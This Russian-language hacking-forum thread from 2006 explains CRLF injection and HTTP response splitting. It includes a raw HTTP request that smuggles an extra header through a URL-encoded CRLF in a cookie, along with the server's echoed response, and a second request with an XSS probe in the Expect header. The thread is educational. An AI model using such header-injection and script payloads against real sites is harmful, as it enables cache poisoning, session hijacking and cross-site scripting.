CRLF injection

Discussion in 'Уязвимости' started by Electro, 22 Aug 2006.

Thread Status:
Not open for further replies.
  1. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Кто нибудь может обяснить человеческим языком что это такое ?? CRLF injection
    Описания на инглишь выгледит так но я не очень то понял что к чему :(
    Я понял только то что типа стырания куков через XSS
    Просто названия такое возбуждающее=)) :D CRLF injection

    This script is possibly vulnerable to CRLF injection attacks.

    HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
    HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.
     
  2. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,028
    Reputations:
    1,228
    Привет от blackybr:

    http://www.acunetix.com/websitesecurity/crlf-injection.htm
    http://www.securiteam.com/securityreviews/5WP022K75O.html
     
    _________________________
  3. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Мда...еслиб знал Инглиш гуд то не обратился бы
    Все равно спасибо )
    А blackybr-а я незнаю ..)
     
  4. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    GET /index.php HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0 (MSIE 6.0; Windows NT 5.0;)
    Host: localhost
    Cookie: PHPSESSID=%0d%0aLOL%3ALOL2
    Connection: Close
    Pragma: no-cache


    вернет ответ сервера
    HTTP/1.1 200 OK
    Date:Tue, 22 Aug 2006 07:54:28 GMT
    Server:Apache/1.3.33-Pool-060606.1 (Win32) PHP/4.3.11
    X-Powered-By:pHP/4.3.11
    Expires:Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    LOL:LOL2
    Pragma:no-cache
    Content-Type:text/html
    Connection:close
     
    #4 k1b0rg, 22 Aug 2006
    Last edited: 22 Aug 2006
  5. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Ну имхо щас уже ясно ...
    это типа XSS на апаче

    GET / HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
    Host: http://localhost
    Cookie: hotlog=1;path=/
    Connection: Close
    Expect: <script>alert(Electro)</script>
    Pragma: no-cache

    Разница получился в том что в CRLF injection идет манупуляция с куками

    Все! Ясно! Всем спасибо за ответы
    Тему можно закрыть
     
    #5 Electro, 22 Aug 2006
    Last edited: 22 Aug 2006
  6. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    >Разница получился в том что в CRLF injection идет манупуляция с куками
    не обязательно с куками, суть атаки вообще в том, что при помощь CRLF, тоесть переноса каретки, можно нарушить заголовок.
     
    _________________________
  7. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    ага...ясно, спасибо большое!
     
Thread Status:
Not open for further replies.